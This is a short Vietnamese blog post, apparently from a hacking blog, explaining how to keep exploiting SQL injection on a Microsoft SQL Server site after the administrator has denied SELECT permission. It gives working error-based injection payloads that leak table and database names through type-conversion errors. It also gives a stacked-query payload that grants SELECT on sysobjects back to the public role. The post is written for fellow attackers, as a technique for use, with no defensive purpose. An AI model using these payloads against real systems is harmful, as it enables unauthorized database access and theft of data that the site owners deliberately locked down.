Twitter Delicious Facebook Digg Stumbleupon Favorites More

Thứ Ba

Hack SQL Injection bị deny SELECT

Bình thường khi query

Trích dẫn
convert(int,(select top 1 table_name from information_schema.tables))--

bay ra lỗi
Trích dẫn
Syntax error converting the nvarchar value 'table_name' to a column of data type int

nhưng nếu bay ra lỗi
Trích dẫn
SELECT permission denied on object 'sysobjects', database 'XXXXX', owner 'dbo'.

thường anh em bỏ nó or toàn chơi tool thấy ko query dc bỏ luôn.

thằng admin đã deny SELECT ,ko SELECT thì convert dc cái khỉ j` .
dùng query sau:
Trích dẫn
;use dataname grant keyword on tables to public

trc' hết dùng convert(int,db_name()) để bít dataname,ví dụ là vnc
query fat nào

Trích dẫn
;use vnc grant select on sysobjects to public--

0 nhận xét:

Đăng nhận xét

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Blogger Templates